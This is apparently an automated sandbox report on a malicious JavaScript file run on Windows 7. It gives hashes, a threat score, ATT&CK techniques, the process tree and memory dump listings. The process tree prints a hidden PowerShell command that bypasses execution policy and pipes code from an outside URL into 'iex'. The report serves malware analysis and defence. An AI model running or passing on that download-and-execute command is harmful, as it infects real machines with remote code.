aec2646ebe29ad68516daec6f9cc1899e6a7a6278d72ce6a1c5c6ebe8158bac1

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
submitted
03/03/2025, 14:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aec2646ebe29ad68516daec6f9cc1899e6a7a6278d72ce6a1c5c6ebe8158bac1.js
Size

595KB
MD5

e11e833bd0845410c1fd9e1e36159f35
SHA1

dd3973964cbabf55907780345f52570b6738d912
SHA256

aec2646ebe29ad68516daec6f9cc1899e6a7a6278d72ce6a1c5c6ebe8158bac1
SHA512

a3d3458ec3540bbbdc3f71ef8fc791cbcad92edb996e0eddf56d5b34459b85f753ae757919d9b21ccd5005d61ef05e601a4b9bf1bf204dcc971c6f27efa22e7a
SSDEEP

1536:ay99U99cssqg09Cqg099sqg09Nsqg09Qsq1sqg09V09esqg09Ysqg09Lsqqsqg07:YG

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2388	powershell.exe

Deletes itself 1 IoCs

pid	Process
2232	wscript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2388	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2388	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2232 wrote to memory of 2388	2232	wscript.exe	31
PID 2232 wrote to memory of 2388	2232	wscript.exe	31
PID 2232 wrote to memory of 2388	2232	wscript.exe	31

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\aec2646ebe29ad68516daec6f9cc1899e6a7a6278d72ce6a1c5c6ebe8158bac1.js
1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://hisatophjrok12.top/1.php?s=flibabc11 |iex"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2388-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

Filesize
4KB

Download
memory/2388-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2388-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download
memory/2388-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/2388-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/2388-11-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/2388-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/2388-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download
memory/2388-12-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

Filesize
9.6MB

Download